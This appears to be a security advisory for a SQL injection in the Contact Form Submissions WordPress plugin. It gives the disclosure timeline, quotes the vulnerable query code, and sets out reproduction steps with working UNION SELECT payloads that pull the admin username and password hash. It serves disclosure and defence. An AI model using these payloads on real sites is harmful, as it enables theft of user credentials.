The plugin is affected by a double query SQL injection, which could allow high privileged users to access data from the DBMS. Edit (WPScanTeam) October 26th, 2020 - Confirmed & Escalated to WP October 27th, 2020 - WP Investigating January 3rd, 2021 - No updates, disclosing March 29th, 2021 - v1.7 released to attempt to remediate the issue using sanitize_text_field(), which does not fix the SQL injection April 7th, 2021 - v1.7.1 released, fixing the issue
Pre requirements: Install Contact form 7 Install Contact Form Submission Affected File : contact-form-submissions/Admin.php:416 Code: global $wpdb; $post_id = $wpdb->get_var("SELECT post_id FROM $wpdb->postmeta WHERE meta_key = 'form_id' AND meta_value = $form_id LIMIT 1;"); $columns = $wpdb->get_col("SELECT meta_key FROM $wpdb->postmeta WHERE post_id = $post_id AND meta_key LIKE '%wpcf7s_%' GROUP BY meta_key"); To reproduce: 1 - Authenticate with an admin user. 2 - Access the profile page, change last name field to 0 UNION SELECT concat(user_login,'---',user_pass) FROM wp_users WHERE ID=1-- 3 - Open https://localhost/wp-admin/edit.php?post_type=wpcf7s&wpcf7_contact_form=0 UNION SELECT meta_value FROM wp_usermeta WHERE umeta_id=1 and increment the umeta_id parameter until there is the admin username and hashed password output as a column.
Lenon Leite
Lenon Leite
Yes
2021-01-03 (about 2 years ago)
2021-01-03 (about 2 years ago)
2021-04-08 (about 2 years ago)